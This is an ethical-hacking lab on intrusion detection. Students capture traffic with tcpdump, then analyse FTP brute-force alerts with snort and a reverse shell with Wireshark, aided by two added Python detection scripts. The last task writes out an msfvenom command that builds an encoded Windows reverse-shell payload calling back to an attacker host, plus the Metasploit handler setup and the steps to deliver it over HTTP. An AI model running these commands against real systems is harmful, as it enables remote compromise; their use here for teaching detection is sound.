SNHU - Intrusion Detection using Snort
Introduction
Objective
Overview
This lab is part of a series of lab exercises intended to support courseware for Ethical Hacker
training. The development of this document is funded by the Department of Labor (DOL)
Trade Adjustment Assistance Community College and Career Training (TAACCCT) Grant No.
TC-22525-11-60-A-48.
In this lab, students will capture network traffic with tcpdump, examine it in Wireshark, and analyze capture files with snort to detect a password brute-force attack and a reverse command shell.
This lab includes the following tasks:
1 - Setting Up the Sniffer
2 - Detecting Unwanted Incoming Traffic
3 - Detecting Unwanted Outgoing Traffic
Key Term Description

Wireshark
A protocol analyzer that reads binary capture files. Wireshark can also capture
network traffic itself and runs on Windows, Linux, and Mac OS X.

snort
An Intrusion Detection System (IDS) that can be used to analyze and capture
traffic. By matching traffic against signatures (rules), snort can report on the
activity within a capture file. Snort can be downloaded from www.snort.org; the
engine is free, with commercial rule subscriptions available. Snort was created
by Sourcefire, a Columbia, Maryland-based company, which Cisco acquired in 2013;
Cisco now maintains and develops it.

tcpdump
A Linux/UNIX program that allows you to capture network traffic. The tcpdump
program comes installed on many Linux distributions by default.

Sniffer
A sniffer is used to capture traffic on a network. Software programs like
tcpdump, Wireshark, and Network Miner can be used to sniff traffic.

PCAP File
Programs that sniff network traffic, such as tcpdump, Wireshark, and Network
Miner, can save the capture in the PCAP file format. To read a PCAP file you
need a tool such as Wireshark or Network Miner (tcpdump -r reads one as well).
Setting Up the Sniffer
Passwords help to secure systems that are administered remotely. If an attacker
obtains the administrator password for a remote system, he or she can take
complete control of that device. Companies need mechanisms in place to protect
systems connected to the Internet from exploitation by remote attackers, and to
detect attempts such as the password brute force captured later in this lab.
Logging on to the Sniffer
The Linux distribution Kali 2 is installed on the sniffer machine. Kali 2 is a distribution used by
security professionals for penetration testing and forensics.
1. Click on the Sniffer Linux icon on the topology.
   Note: If the screen is displaying only the time, press Enter.
2. Type root for the Username. Click Next.
3. For the Password, type toor (root spelled backwards) and click the Sign In button.
   Note: The password of toor will not be displayed when you type it, for security purposes.
4. Click the black and white icon (second from the top) to launch the Linux terminal.
5. Type the following command to view active interfaces. Press Enter.
   root@kali2:~# ifconfig
   Note: Only the loopback address, 127.0.0.1, is displayed. Without -a, ifconfig
   lists only interfaces that are up.
   Neither of the interfaces, eth0 or eth1, is assigned an IP address on its
   respective network. The reason the sniffer has two interfaces is that it is
   located on two networks, the internal network (LAN) and the external network (WAN).
   Note: The 2008 Firewall also has two interfaces and is also connected to both
   networks.
   A sniffer should operate in promiscuous mode so it can see all traffic on the
   segment, not just frames addressed to its own MAC address; tcpdump puts the
   interface into promiscuous mode itself when it starts capturing. The next
   steps bring the interfaces up without assigning an IP address, so the sniffer
   can listen on both segments without taking part in either network's IP traffic.
   Two ways to ensure that a sniffer will capture all traffic on a network segment:
   Connect the sniffer and the other devices on the network to a hub
   Connect the sniffer to a switch's SPAN (Switched Port Analyzer) port
6. To bring up the first interface (with no IP address), type the following command. Press Enter.
   root@kali2:~# ifconfig eth0 0.0.0.0 up
7. To bring up the second interface, type the following command. Press Enter.
   root@kali2:~# ifconfig eth1 0.0.0.0 up
The Linux/UNIX utility tcpdump is commonly used by network administrators to capture
network traffic on a sniffer. Many sniffer machines have no GUI (Graphical User
Interface), so GUI-based tools like Wireshark or Network Miner cannot be run on them.
Another benefit of tcpdump is that it handles very large captures well: it streams
packets straight to disk, whereas Wireshark loads a file into RAM, so a large enough
file might not open.
8. Type the following command to view several of the available switches for tcpdump. Press Enter.
   root@kali2:~# tcpdump --help
9. To run tcpdump on the network segment that interface eth0 is connected to, type the following. Press Enter.
   root@kali2:~# tcpdump -i eth0
10. Click the Internal Windows 2008 Server from the topology.
11. After the machine boots, click the Send Ctrl+Alt+Delete button in the top right corner.
12. Log on to the Windows Server with the password of P@ssw0rd12
    Note: The "0" in password is a ZERO. The password will not be displayed when
    you type it, for security purposes. The reason we are logging in to this
    machine is so that it begins to generate traffic.
13. Go back to the Kali Sniffer. Wait until at least one IPv4 packet is displayed
    before stopping the capture. It could take a couple of minutes before a packet
    shows up. Also, what you see might differ from the screenshot below. That's OK.
    After one or more IPv4 packets are displayed, press Ctrl+C to stop the network
    capture. If addresses on the 192.168.1.0/24 network are displayed, eth0 is
    located on the first (internal) network. If addresses on the 216.0.0.0/8
    network are displayed, eth0 is located on the second (external) network. Also
    notice the capture size that tcpdump reports in its first line of output:
    older versions of tcpdump capture only the first 68 or 96 bytes of each packet
    by default, which truncates packet payloads, while newer versions capture whole
    packets. The -s 0 switch used later in this lab makes tcpdump capture each
    packet in full regardless of version.
Click on the Sniffer inthe topology.
14
root@kali2:~#
tcpdump –ieth1
To run tcpdump on the network segment interface eth1 is connected to, type the
following. Press Enter
15
Click on the Windows 7 Attack Machine from the topology.
16
Log on to Windows 7 as student with the password of
password
Press Enter.
17
Note: The password of password will not be displayed when you type it for
security purposes. We are only logging into this machine so it begins to generate
traffic.
Click on the Sniffer icon on the topology.
18
Wait until at least one packet is displayed before stopping the capture. If you do not
see any traffic after a few minutes, make sure you are logged on to the Windows 7
machine as student with the password of password.
19
After one packet or more is displayed, press Ctrl+C to stop the network capture. If the
network 192.168.1.0/24 is displayed, eth1 is located on the first (internal) network. If the
network 216.0.0.0/8 is displayed, eth1 is located on the second (external) network. The -s 0
switch is used to capture the full packet size (65,536).
20. To capture traffic on the 192.168.1.0/24 network and send it to a file, type the following. Press Enter.
    root@kali2:~# tcpdump -i eth0 -nnntt -s 0 -w capnet1.cap -C 100
    Note: Be sure to enter the appropriate interface in the command syntax! Use
    whichever interface (eth0 or eth1) you found on the 192.168.1.0/24 network in
    steps 13 and 19.
    The following table lists details of the switches used with the tcpdump command:
    -i eth0    Capture on interface eth0
    -nnntt     -nn disables DNS resolution of host names and of port/protocol
               numbers (the extra n in -nnn is harmless); -tt prints timestamps
               as raw seconds since the epoch instead of the default time of day
    -s 0       Capture each packet in full instead of truncating it to the default
               snapshot length (only 68 or 96 bytes on older tcpdump versions)
    -w         Write raw packets to a capture file instead of displaying them on
               the screen
    -C 100     Start a new capture file once the current one reaches 100 million
               bytes; later files get the -w name with 1, 2, 3, ... appended
    Note: -nn and -tt only change how tcpdump prints packets; with -w the raw
    packets are written to the file unchanged, so the file can be read by any
    PCAP tool. If tcpdump reports "Permission denied" when -C rotates to a new
    file, it is because Debian-based builds drop privileges to an unprivileged
    tcpdump user before creating it; write to a directory that user can write
    to, or add -Z root to the command.
    Wait about 5 minutes so that your capture file will have some generated
    traffic. Packets will not be displayed in the terminal because they are being
    written to the file. Press Ctrl+C to stop tcpdump and end the network capture.
21. To view the capture file, type the following command at the Terminal. Press Enter.
    root@kali2:~# wireshark capnet1.cap
    Wireshark will open and the capture file will appear, similar to the one seen
    below. Notice that the traffic listed takes place on the 192.168.1.0/24 network.
22. Click OK to the Lua Error when Wireshark opens.
23. From the File menu, select Quit to close Wireshark.
24. To capture traffic on the 216.0.0.0/8 network and send it to a file, type the following. Press Enter.
    root@kali2:~# tcpdump -i eth1 -nnntt -s 0 -w capnet2.cap -C 100
    Note: Wait about 5 minutes so that your capture file will have some generated
    traffic. While waiting, log off and back on to the external Windows 7 Attack
    machine as student with the password of password to generate some traffic for
    your capture file.
25. Click on the Sniffer icon from the topology. Press Ctrl+C to stop tcpdump from
    running and end the network capture.
26. Type the following command to view the capture file. Press Enter.
    root@kali2:~# wireshark capnet2.cap
    Wireshark will open and the capture file will appear similar to the one seen
    below. Notice that the traffic listed takes place on the 216.0.0.0/8 network.
27. Click OK to the Lua Error when Wireshark opens.
28. From the File menu, select Quit to close Wireshark.
CONCLUSION:
Sniffers are a very important part of network monitoring. In the real world, capture
files are huge and can crash GUI-based programs that load the whole file into RAM.
The tcpdump utility can be used on a Linux system to capture network traffic straight
to disk, in files that Wireshark and snort can read afterwards.
Detecting Unwanted Incoming Traffic
Insiders are a huge threat to networks because they are already inside the firewall.
For this reason, most internal networks are monitored. In this section, we will
monitor the internal network while an attack is conducted and then review the alerts
that snort generates from the capture.
Detecting Attacks
We will capture the internal network traffic to a file with tcpdump and later analyze
that file with snort. Snort has three modes of operation: as a sniffer it dumps
packets to the screen, as a packet logger it writes them to a log directory, and as
an IDS it matches traffic against its rules and writes alerts. Here we use the IDS
mode offline: snort reads the capture file (-r) instead of a live interface, applies
the rules referenced by snort.conf (-c), and writes its alerts to the current
directory (-l .).
Perform the following steps on the Kali 2 sniffer.
1. Type the following command to start the sniffer on the internal interface. Press Enter.
   root@kali2:~# tcpdump -i eth0 -nnntt -s 0 -w brute.cap -C 100
2. Click on the Windows 7 icon from the topology.
3. Open a command prompt by double-clicking the cmd-Shortcut on the desktop.
4. Type the following command to scan the firewall for open ports. Press Enter.
   C:\> nmap 216.1.1.1
   Note: This may take up to 30 seconds to run.
5. Double-click on the Bruter.exe shortcut on the Windows 7 Desktop.
6. Type 216.1.1.1 for the Target IP. For the User, type administrator. For the
   Dictionary, click the Browse button. Click Wordlist.txt and click Open.
7. Click the Start button to initiate the brute force attack against FTP.
8. Within Bruter, click on the Testing tab to view the actions against the victim.
   Note: This will take about 5 minutes to run. Keep in mind that the screenshot
   you see below might not match exactly, depending on when you stop the test.
9. After Bruter has cycled through the dictionary words, click the Result tab.
10. Click on the Sniffer icon from the topology.
11. On the Sniffer, press Ctrl+C to stop the tcpdump program. Type the following. Press Enter.
    root@kali2:~# snort -l . -c /etc/snort/snort.conf -r brute.cap
12. Wait for a new prompt and then type the following command to confirm that the
    alert.ids file has been created. Press Enter.
    root@kali2:~# ls
    Note: If you do not see alert.ids, look for a file named simply alert; the
    file name depends on the alert output configured in snort.conf.
13. Type the following command to view the alert file generated by snort. Press Enter.
    root@kali2:~# leafpad alert.ids
14. Scroll through the file and you should see a large number of brute force
    attempts. The alert file records the following about what took place on the
    internal network:
    The attack by 216.1.1.200 against port 21 (FTP)
    The large number of attempts within seconds, which indicates that this is not
    normal activity
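As an added example (not part of the lab, and not code from the Snort project), the following Python script does with code what step 14 does by eye: it parses alert lines in Snort's single-line alert_fast format, groups them by attacker, victim and destination port, and flags any source that exceeds a threshold of attempts inside a sliding time window. The alert lines it runs on are constructed to resemble this lab's Bruter run; the rule SID, message text, timestamps and the victim address 192.168.1.100 are assumptions. The alert.ids file from step 12 may be in Snort's multi-line full alert format instead, in which case the regular expression would need adapting.

```python
"""Parse Snort alert_fast lines and flag password-guessing bursts against one port."""
import re
from collections import defaultdict
from datetime import datetime

# One alert per line, as Snort's alert_fast output writes it:
#   MM/DD-HH:MM:SS.usec  [**] [gid:sid:rev] message [**] [Classification: ...]
#   [Priority: n] {PROTO} src:sport -> dst:dport
FAST_ALERT = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\].*?"
    r"\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_alert(line, year=2022):
    """Return the alert's fields as a dict, or None for lines that are not alerts.
    alert_fast timestamps carry no year, so the caller supplies it."""
    m = FAST_ALERT.match(line.strip())
    if not m:
        return None
    return {
        "time": datetime.strptime(f"{year}/{m['ts']}", "%Y/%m/%d-%H:%M:%S.%f"),
        "sid": int(m["sid"]), "msg": m["msg"], "proto": m["proto"],
        "src": m["src"], "dst": m["dst"], "dport": int(m["dport"]),
    }


def find_bruteforce(lines, dport=21, max_attempts=10, window_seconds=60):
    """Group alerts by (src, dst, dport) and report each pair whose alert count
    inside any window_seconds-wide sliding window exceeds max_attempts.
    Returns {(src, dst, dport): peak_attempts_in_window}."""
    times_by_pair = defaultdict(list)
    for line in lines:
        alert = parse_alert(line)
        if alert and alert["dport"] == dport:
            times_by_pair[(alert["src"], alert["dst"], dport)].append(alert["time"])
    findings = {}
    for pair, times in times_by_pair.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1                      # slide the window forward
            peak = max(peak, end - start + 1)
        if peak > max_attempts:
            findings[pair] = peak
    return findings


def sample_alerts():
    """Constructed alert lines (not real Snort output) shaped like this lab's Bruter run:
    25 FTP login alerts in 25 seconds from the attacker, one lone login from an internal
    host, and one line of non-alert noise. SID 1000001 is in the local-rule range and is
    an assumption, not a real rule."""
    lines = [
        f"01/15-10:32:{i:02d}.000100  [**] [1:1000001:1] LOCAL FTP login attempt [**] "
        f"[Classification: Misc activity] [Priority: 3] {{TCP}} 216.1.1.200:{49152 + i} -> 192.168.1.100:21"
        for i in range(25)
    ]
    lines.append("01/15-10:40:00.000100  [**] [1:1000001:1] LOCAL FTP login attempt [**] "
                 "[Classification: Misc activity] [Priority: 3] {TCP} 192.168.1.50:51000 -> 192.168.1.100:21")
    lines.append("Not an alert line: some builds write other text into the file")
    return lines


if __name__ == "__main__":
    for (src, dst, port), n in find_bruteforce(sample_alerts()).items():
        print(f"{src} -> {dst}:{port}: {n} attempts within 60 s (brute force)")
```

Snort can apply the same rate logic itself: the detection_filter rule option (track by_src, count N, seconds M) makes a rule fire only after a source exceeds N matches in M seconds, and event_filter entries in threshold.conf suppress repeats, so a brute force shows up as a few findings rather than one alert line per password tried.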
CONCLUSION:
The tcpdump utility can be used to capture network traffic. After a capture file has
been generated, that capture file can be analyzed with snort. An alert file is
generated when snort examines the traffic, and the alerts help us identify malicious
network activity.
Detecting Unwanted Outgoing Traffic
While internal threats like insiders are very real, the threats from attackers on the
Internet are also very real. If an employee inside a company's network is caught
performing malicious actions on the network, he or she might get fired or face
criminal prosecution. An attacker from the Internet may never face any consequences,
because he or she might live in a part of the world outside your jurisdiction.
Using Wireshark
Note: Click the X in the top right corner to close the alert.ids window.
In this exercise, we will capture the network traffic with tcpdump and then analyze
the PCAP file with Wireshark. The same file could also be analyzed with snort, which
reads PCAP files written by most sniffer programs.
1. On the Sniffer, type the following command to start the sniffer on the internal interface. Press Enter.
   root@kali2:~# tcpdump -i eth0 -nntttt -s 0 -w badtraffic.cap
   Note: -tttt prints each timestamp as a full date and time; with -w it does not
   change what is written to the file.
   To create the malicious software that an internal network user will later run,
   perform the following steps on the External Machine running Kali 2 Linux.
2. Click on the External Kali 2 Linux icon on the topology.
   Note: If the Kali 2 machine is displaying only the time, press Enter.
3. Type root for the username. Click Next.
4. For the Password, type toor (root spelled backwards) and click the Sign In button.
   Note: The password of toor will not be displayed when you type it, for security purposes.
5. Click the black and white icon (second from the top) to launch the Linux terminal.
6. Type the following command to generate a payload. Press Enter.
   root@kali2:~# msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp lhost=216.1.1.100 lport=443 -f exe -e x86/shikata_ga_nai -o bad.exe
   Note: This entire command is 1 line; do not press Enter until the entire
   command is typed. The payload connects back from the victim to 216.1.1.100 on
   port 443, a port commonly chosen because outbound HTTPS is usually allowed
   through firewalls. windows/shell/reverse_tcp is a staged payload, so the
   handler in step 12 must be set to exactly the same payload name.
7. Type the following command to start the postgresql service. Press Enter.
   root@kali2:~# service postgresql start
8. Type the following command to launch the msfconsole of the Metasploit framework. Press Enter.
   root@kali2:~# msfconsole
   Note: The Metasploit banner message often changes and frequently differs from
   this photo.
9. To use the multi-handler within Metasploit, type the following command. Press Enter.
   msf > use exploit/multi/handler
10. Set the listening host to the external Kali machine's address by typing the following command. Press Enter.
    msf exploit(handler) > set lhost 216.1.1.100
11. Set the listening port to 443 by typing the following command. Press Enter.
    msf exploit(handler) > set lport 443
12. Set the payload to a reverse Windows command shell by typing the following. Press Enter.
    msf exploit(handler) > set payload windows/shell/reverse_tcp
13. Type the following command to verify you have set all of the options correctly. Press Enter.
    msf exploit(handler) > show options
14. To begin listening on port 443, type the following. Press Enter.
    msf exploit(handler) > exploit
15. Select File on the Linux Terminal menu. Click on Open Terminal.
16. To start Apache, type the following command. Press Enter.
    root@kali2:~# apache2ctl start
17. To view the current listening services, type the following command. Press Enter.
    root@kali2:~# netstat -tan
    After starting Apache, the Kali system is now also listening on port 80, in
    addition to the handler on port 443.
18. To confirm the listening ports with a port scan of the local machine, type the following command. Press Enter.
    root@kali2:~# nmap 127.0.0.1
19. Type the following command to copy bad.exe to the HTTP document root. Press Enter.
    root@kali2:~# cp bad.exe /var/www/html
20. Type the following command to list the files within the HTTP document root. Press Enter.
    root@kali2:~# ls /var/www/html
21. Click on the Internal Windows 2008 Server on the topology.
22. Double-click on the Internet Explorer shortcut on the Desktop.
23. Open the following URL in Internet Explorer and click Run twice:
    http://216.1.1.100/bad.exe
    Someone may go to a URL such as this because of a Facebook or Twitter post, a
    spear-phishing email, or they might wind up there after using a search engine.
24. Click on the External Kali 2 machine from the topology.
25. Return to the Linux Terminal with the exploit prompt. View the connection to
    the victim.
26. Type the following command to test the connection by getting a directory listing. Press Enter.
    C:\Users\Administrator\Desktop> dir
27. Click on the Sniffer icon from the topology.
28. Press Ctrl+C to stop the tcpdump program. Type the following. Press Enter.
    root@kali2:~# wireshark badtraffic.cap
29. Click OK to the Lua Error when Wireshark opens.
30. Type the following in the Wireshark filter pane, then click the Apply button to apply the filter:
    frame contains "Microsoft Windows"
    Note: Use straight double quotes. This filter matches any frame whose bytes
    contain that string. The Windows command prompt banner is sent by the victim
    to the attacker as soon as the reverse shell connects, so the matching frame's
    source address is the compromised internal host and its destination is the
    attacker's listener on port 443.
31. Right-click on the packet that is displayed and select Follow TCP Stream.
32. View the network traffic between the attacker and victim machines. Because
    the shell is a plain TCP connection with no encryption, every command the
    attacker typed and all of its output are readable in the stream.
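As an added example (not from the lab, and not code from tcpdump, Wireshark or snort), the following Python module reads a capture file written by tcpdump -w using only the standard library. It covers both points this lab makes about capture files: from Task 1, deciding which network an interface sits on by looking at the addresses in the capture, and noticing when records were truncated by a short snapshot length (the reason for -s 0); and from this task, searching TCP payloads for a string, which is what the Wireshark filter frame contains "Microsoft Windows" does. The capture it runs on is constructed in memory to follow the lab topology (the 2008 server at 192.168.1.100, the attacker at 216.1.1.100); the host addresses, ports and exact banner text are assumptions, not taken from the lab's screenshots.

```python
"""Read a classic libpcap file as tcpdump -w writes it, using only the standard library."""
import ipaddress
import struct

PCAP_MAGIC_LE = 0xA1B2C3D4        # magic of a little-endian file (usual on x86)
PCAP_MAGIC_BE = 0xD4C3B2A1        # the same magic read from a big-endian file
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6


def iter_packets(data):
    """Yield (timestamp, wire_length, captured_bytes) for every record in a pcap."""
    magic, = struct.unpack_from("<I", data, 0)
    end = {PCAP_MAGIC_LE: "<", PCAP_MAGIC_BE: ">"}.get(magic)
    if end is None:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    _major, _minor, _tz, _sigfigs, _snaplen, linktype = struct.unpack_from(end + "HHiIII", data, 4)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    off = 24                                    # size of the global header
    while off + 16 <= len(data):                # 16-byte record header per packet
        ts_sec, ts_usec, incl_len, orig_len = struct.unpack_from(end + "IIII", data, off)
        off += 16
        yield ts_sec + ts_usec / 1e6, orig_len, data[off:off + incl_len]
        off += incl_len


def decode_frame(frame):
    """Decode Ethernet/IPv4, plus TCP ports and payload when present; None if not IPv4."""
    if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_IPV4:
        return None
    ihl = (frame[14] & 0x0F) * 4                # IPv4 header length in bytes
    total_len = struct.unpack_from("!H", frame, 16)[0]
    pkt = {"src": str(ipaddress.IPv4Address(frame[26:30])),
           "dst": str(ipaddress.IPv4Address(frame[30:34])),
           "proto": frame[23], "sport": None, "dport": None, "payload": b""}
    tcp = 14 + ihl
    if pkt["proto"] == IPPROTO_TCP and len(frame) >= tcp + 20:
        pkt["sport"], pkt["dport"] = struct.unpack_from("!HH", frame, tcp)
        doff = (frame[tcp + 12] >> 4) * 4       # TCP header length in bytes
        pkt["payload"] = frame[tcp + doff:14 + total_len]   # shorter if the record was truncated
    return pkt


def networks_seen(data, prefix=24):
    """Networks the IPv4 addresses in the capture fall into (which segment an interface is on)."""
    nets = set()
    for _ts, _wire, frame in iter_packets(data):
        pkt = decode_frame(frame)
        if pkt:
            nets.update(str(ipaddress.ip_network(f"{ip}/{prefix}", strict=False))
                        for ip in (pkt["src"], pkt["dst"]))
    return sorted(nets)


def truncated_packets(data):
    """(index, captured, on_wire) for records cut short by a small snaplen, i.e. no -s 0."""
    return [(i, len(f), wire) for i, (_ts, wire, f) in enumerate(iter_packets(data)) if len(f) < wire]


def find_in_payloads(data, needle):
    """(src, sport, dst, dport) of every TCP segment whose payload contains needle."""
    hits = []
    for _ts, _wire, frame in iter_packets(data):
        pkt = decode_frame(frame)
        if pkt and needle in pkt["payload"]:
            hits.append((pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"]))
    return hits


# --- constructed sample data (not real traffic) -----------------------------
def build_frame(src, dst, sport, dport, payload):
    """Minimal Ethernet/IPv4/TCP frame; checksums are left zero, which the parser ignores."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, 64, IPPROTO_TCP, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return bytes(12) + struct.pack("!H", ETHERTYPE_IPV4) + ip + tcp


def build_pcap(frames, snaplen=65535):
    """Write frames as a little-endian pcap, truncating each to snaplen like tcpdump -s would."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, snaplen, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        kept = frame[:snaplen]
        out += struct.pack("<IIII", 1_600_000_000 + i, 0, len(kept), len(frame)) + kept
    return out


def sample_capture(snaplen=65535):
    """Constructed capture following the lab topology: the internal server's reverse shell
    banner to the attacker's port 443, the attacker's dir command, and an unrelated request."""
    banner = (b"Microsoft Windows [Version 6.0.6002]\r\nCopyright (c) 2006 Microsoft Corporation."
              b"  All rights reserved.\r\n\r\nC:\\Users\\Administrator\\Desktop>")
    return build_pcap([
        build_frame("192.168.1.100", "216.1.1.100", 49200, 443, banner),
        build_frame("216.1.1.100", "192.168.1.100", 443, 49200, b"dir\r\n"),
        build_frame("216.1.1.200", "216.1.1.1", 51000, 80, b"GET / HTTP/1.1\r\nHost: 216.1.1.1\r\n\r\n"),
    ], snaplen)


if __name__ == "__main__":
    cap = sample_capture()
    print("networks:", networks_seen(cap))
    print("shell banners:", find_in_payloads(cap, b"Microsoft Windows"))
    print("truncated with snaplen 96:", truncated_packets(sample_capture(snaplen=96)))
```

Note the direction of the hit: the banner travels from the victim to the attacker, so the source of the matching segment is the compromised internal host. With a 96-byte snapshot length the banner's first bytes still survive, so the filter would still match, but the prompt and every command and response after it are gone from the file; that is the practical cost of capturing without -s 0 on an older tcpdump.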
© 2022 - Infosec Learning INC. All Rights Reserved.
CONCLUSION:
Wireshark can be used to capture and analyze network traffic. Filters can be used to
look for certain IP addresses, protocols, or phrases within a capture file. The filter
frame contains "Microsoft Windows" can help to locate unencrypted Windows command
shells in traffic.
Note: Press the STOP button to complete the lab.